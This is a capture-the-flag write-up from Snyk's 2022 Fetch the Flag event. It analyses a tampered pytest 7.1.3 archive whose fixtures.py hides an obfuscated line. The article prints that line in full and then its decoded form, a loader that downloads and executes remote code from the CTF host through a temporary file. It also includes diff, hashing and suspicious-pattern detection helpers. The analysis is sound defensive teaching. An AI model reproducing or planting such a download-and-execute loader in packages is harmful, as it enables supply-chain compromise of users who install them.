Fetch the Flag CTF 2022 writeup: Pay Attention
Assaf Ben Josef
November 10, 2022
Thanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. And a huge thanks to the Snykers that built, tested, and wrote up the challenges!
In this post, we’ll take a look at how our team tackled the pay-attention challenge of Snyk’s 2022 Fetch the Flag CTF. This challenge simulates a case where a popular package has likely been hijacked and turned malicious — and we’ll be taking on the role of the security researcher looking into the issue!
Walkthrough
When we start, we are greeted with a downloadable file, pytest-7.1.3.tar.gz, and the hint “Have you been payin’ attention lately?”.
Right off the bat, we notice the file name. Pytest is a super popular Python testing framework, and as of this writing, 7.1.3 is its latest release version. So, it seems that this file is supposed to be an archive of the latest pytest release.
Now, it definitely can’t be a 1:1 copy of the real pytest 7.1.3, because otherwise we’d have nothing to go on! To verify that, we’ll go to the pytest GitHub repository, and download the source code for the 7.1.3 release. If we inspect the properties of these archive files, we’ll be able to spot that the CTF version of pytest is just a tiny bit larger than the original pytest release.
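The size check can also be done from a script rather than the file manager. The following is a minimal sketch, not the method used during the CTF: the helper name fingerprint and the two file names in the usage comment are hypothetical. It reports each archive's size together with a SHA-256 digest. Differing digests only show that the archives are not byte-identical, which can also happen when the same files are simply repackaged, so this is a first hint rather than proof of tampering.

```python
import hashlib
from pathlib import Path


def fingerprint(path):
    """Return (size in bytes, SHA-256 hex digest) for the file at path."""
    data = Path(path).read_bytes()
    return len(data), hashlib.sha256(data).hexdigest()


# Usage, with hypothetical file names for the two downloads:
#   print(fingerprint("pytest-7.1.3-github.tar.gz"))
#   print(fingerprint("pytest-7.1.3-ctf.tar.gz"))
```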
To find exactly where these two archives differ, we can extract both and compare the resulting folders with our terminal’s diff -rq command, which recursively walks the folder contents and reports which files differ.
Now, we find some minor differences in a few metadata files. But also, and more importantly, one of the actual source code files, fixtures.py, is different between these two folders. That must be it!
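For readers without diff at hand, the same recursive comparison can be approximated in Python with the standard filecmp module. This is a sketch under assumptions: the function name differing_files and the folder names in the usage comment are hypothetical, and the output format is not the one diff prints. It passes shallow=False so that file contents are compared byte by byte, since filecmp's default only compares file metadata.

```python
import filecmp
from pathlib import Path


def differing_files(left, right, prefix=Path(".")):
    """Return sorted relative paths that differ or exist on one side only."""
    left, right = Path(left), Path(right)
    listing = filecmp.dircmp(left, right)
    # Entries present in only one of the two folders
    found = [(prefix / name).as_posix()
             for name in listing.left_only + listing.right_only]
    # shallow=False forces a byte-by-byte comparison of the common files
    _, mismatched, unreadable = filecmp.cmpfiles(
        left, right, listing.common_files, shallow=False
    )
    found += [(prefix / name).as_posix() for name in mismatched + unreadable]
    # Recurse into sub-folders that exist on both sides
    for name in listing.common_dirs:
        found += differing_files(left / name, right / name, prefix / name)
    return sorted(found)


# Usage, with hypothetical names for the two extracted folders:
#   for path in differing_files("pytest-original", "pytest-ctf"):
#       print(path)
```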
Paying attention to suspicious code
Inspecting the file with our favorite IDE, by scrolling through the file for a bit (or by the IDE alerting us of an unexpected indent), we’ll find this suspicious line of code:
__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZgpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zcwoKX3R0bXAgPSBfZmYoZGVsZXRlPUZhbHNlKQpfdHRtcC53cml0ZShiIiIiZnJvbSB1cmxsaWIucmVxdWVzdCBpbXBvcnQgdXJsb3BlbiBhcyBfdXU7ZXhlYyhfdXUoJ2h0dHA6Ly9wYXktYXR0ZW50aW9uLmMuY3RmLXNueWsuaW8vaW5qZWN0b3InKS5yZWFkKCkpIiIiKQpfdHRtcC5jbG9zZSgpCnRyeTogX3NzKGYie19lZX0ge190dG1wLm5hbWV9IikKZXhjZXB0OiBwYXNz"),'<string>','\x65\x78\x65\x63'))
From a first impression, this line seems to be importing some libraries and then making some interesting function calls, like b64decode and exec. This is definitely suspicious, but we can’t really know what is going on yet, so let’s get to decoding.
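Scrolling works for a single file, but the tell-tale signs in this line (dynamic imports, exec, Base64 decoding, long runs of hex escapes) can also be searched for mechanically. The sketch below is a rough heuristic, not a malware detector: the pattern list and the name flag_suspicious_lines are our own assumptions, and legitimate code can trigger any of these patterns.

```python
import re

# Heuristic patterns modelled on the injected line; assumptions, not a standard list
SUSPICIOUS_PATTERNS = {
    "dynamic import": re.compile(r"__import__\s*\("),
    "exec/eval call": re.compile(r"\b(?:exec|eval)\s*\("),
    "base64 decoding": re.compile(r"b64decode"),
    "hex-escaped string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
}


def flag_suspicious_lines(source):
    """Return (line number, matched pattern labels) for each line that matches."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        reasons = [label for label, pattern in SUSPICIOUS_PATTERNS.items()
                   if pattern.search(line)]
        if reasons:
            hits.append((number, reasons))
    return hits
```

Running it over the text of fixtures.py would return the line numbers worth a manual look, each with the reasons it was flagged.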
We’re going to start with the shorter strings that share a similar pattern, like \x65\x78\x65\x63.
Some of us might be familiar with the fact that Python 3 uses Unicode to represent strings, and if we dive deeper into the Python 3 documentation, we’ll find that this pattern is simply the \xhh escape sequence: each one stands for the character whose code point has that two-digit hex value.
But we don’t actually need to know all that. Observing the line of code, we can see that these strings are passed as-is into built-in Python functions, such as __import__(), and therefore we can assume that the Python interpreter already knows how to handle them. So, if we spin up a Python REPL, we can call the print() function with any of these strings, which will print out its human-readable form. For example, print('\x65\x78\x65\x63') would give us the string exec. Neat!
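When the strings are read from the file as text instead of being pasted into the REPL as literals, the backslashes are ordinary characters and print() would show them unchanged. A small sketch of how they could be resolved in that case, using the standard unicode_escape codec (the helper name decode_hex_escapes is ours):

```python
def decode_hex_escapes(raw):
    """Interpret literal \\xhh sequences in raw text as the characters they encode."""
    return raw.encode("ascii").decode("unicode_escape")


# The three escaped strings that appear in the injected line
for raw in (
    r"\x62\x75\x69\x6c\x74\x69\x6e\x73",
    r"\x62\x61\x73\x65\x36\x34",
    r"\x65\x78\x65\x63",
):
    print(raw, "->", decode_hex_escapes(raw))
```

The three strings resolve to builtins, base64, and exec.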
After resolving all these, we will be left with this result:
__import__('builtins').exec(
    __import__('builtins').compile(
        __import__('base64').b64decode(
            "ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZgpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zcwoKX3R0bXAgPSBfZmYoZGVsZXRlPUZhbHNlKQpfdHRtcC53cml0ZShiIiIiZnJvbSB1cmxsaWIucmVxdWVzdCBpbXBvcnQgdXJsb3BlbiBhcyBfdXU7ZXhlYyhfdXUoJ2h0dHA6Ly9wYXktYXR0ZW50aW9uLmMuY3RmLXNueWsuaW8vaW5qZWN0b3InKS5yZWFkKCkpIiIiKQpfdHRtcC5jbG9zZSgpCnRyeTogX3NzKGYie19lZX0ge190dG1wLm5hbWV9IikKZXhjZXB0OiBwYXNz"),
        '<string>', 'exec'))
It seems that this script decodes a Base64 string, compiles it, and then executes it. Next, we’d like to know what code is being executed here, so let’s decode that Base64 string using any online decoding tool. This is what we get:
from tempfile import NamedTemporaryFile as _ff
from sys import executable as _ee
from os import system as _ss

_ttmp = _ff(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uu;exec(_uu('http://pay-attention.c.ctf-snyk.io/injector').read())""")
_ttmp.close()
try: _ss(f"{_ee} {_ttmp.name}")
except: pass
This time, the code seems to create a temporary file, write a short script into it, and then execute it. The script in that temporary file will download and execute a piece of code from an online resource (on the Snyk CTF domain).
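The Base64 decoding step does not require an online tool. Python's own base64 module can do it locally, and decoding only turns the text back into source code without running anything. The sketch below is illustrative: decode_payload is a name we made up, and to keep the example short it decodes only the first 64 characters of the payload rather than the whole string.

```python
import base64

# First 64 characters of the Base64 payload from the injected line
PAYLOAD_PREFIX = "ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZgpm"


def decode_payload(b64_text):
    """Decode Base64 text to a string; nothing is compiled or executed."""
    return base64.b64decode(b64_text, validate=True).decode("utf-8")


print(decode_payload(PAYLOAD_PREFIX))
```

The output starts with the first import line of the decoded script shown earlier; passing the full payload string would yield the whole script.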
We’d like to keep following the breadcrumbs and finally figure out what code is executed at the end of this chain, but we’re met with a pretty tough cookie. The code that is being downloaded is totally obfuscated! The only comprehensible portion is at the very top, and it tells us the name and GitHub repo of the tool that was used to obfuscate this code: Hyperion.
Now, our first instinct could be that because we have the obfuscated script and the source code of the obfuscator tool, we should put on our reverse-engineering hat and get to work. However, because this script seems well-obfuscated, and because the obfuscator GitHub repository README file says that there is currently no deobfuscator available, we figured we should exhaust all other options first.
With that mindset, we decided to first download this obfuscated script into a local file and spin up a debugging environment to see if anything interesting happens at runtime. Using our favorite IDE, we can debug and execute this code line by line to monitor what is happening.
Security disclaimer
If this were a real-life scenario and we were dealing with a script that is actually intended to cause harm, we’d do all this in a secure sandbox environment!
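A scripted alternative to stepping through a debugger is to run the code in its own namespace and then list the string values it leaves behind. This is only a sketch and not what we did during the CTF. It assumes the script stores interesting values in module-level variables, the name dump_string_globals is hypothetical, and the stand-in source below is harmless placeholder code rather than the real obfuscated script. Like the debugger approach, it really executes the code, so the sandbox advice above applies in full.

```python
def dump_string_globals(source):
    """Execute source in a fresh namespace and return its string-valued globals.

    WARNING: this runs the code. Only use it inside an isolated sandbox.
    """
    namespace = {"__name__": "__sandbox__"}
    exec(compile(source, "<downloaded>", "exec"), namespace)
    return {
        name: value
        for name, value in namespace.items()
        if isinstance(value, str) and not name.startswith("__")
    }


# Harmless stand-in for a downloaded script (NOT the real CTF payload)
stand_in = "_a = 41 + 1\n_b = 'not-a-real-flag'\n"
print(dump_string_globals(stand_in))
```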
Luckily, our little eye will eventually spy the flag hiding among the declared variables (after cleaning up the backslashes).
Attention paid!
So, just to recap, we’ve had:
A seemingly innocent package that had a suspicious line of code injected into one of its files
The line of code compiles and executes a Base64-encoded script
That script creates and executes a temporary file
That file accesses a remote resource to download an obfuscated script and then executes it
Inspecting and debugging that obfuscated script, we were finally able to find the flag hidden among its declarations.
This type of multi-layered obfuscation is very common when it comes to malicious script injections. What a trip!
Want to learn how we found all the other flags? Check out our Fetch the Flag solutions page to see how we did it.